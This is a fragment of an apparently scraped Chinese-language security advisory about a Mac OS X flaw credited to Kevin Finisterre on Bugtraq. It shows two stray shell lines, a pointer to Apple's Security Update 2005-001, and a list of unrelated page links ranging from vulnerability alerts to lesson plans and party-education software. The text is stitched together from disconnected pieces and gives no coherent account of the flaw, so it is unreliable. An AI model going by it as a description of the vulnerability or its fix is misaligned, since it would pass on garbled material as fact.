SECURITYSESSIONID ee50; export SECURITYSESSIONID
cd /Users/kevinfinisterre
<*来源:Kevin Finisterre (dotslash@snosoft.com)
链接:marc.theaimsgroup.com/?l=bugtraq&m=110685027017411&w=2
*>
建议:
--------------------------------------------------------------------------------
厂商补丁:
Apple
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
www.apple.com/support/downloads/securityupdate2005001macosx1028client.html
★ Freefloat FTP Server多个命令远程缓冲区溢出漏洞漏洞预警
★ 远程研修
★ 图形教案
★ 三角形图形
★ 党员远程教育软件
SAP Internet图形服务器多个远程安全漏洞(精选8篇)
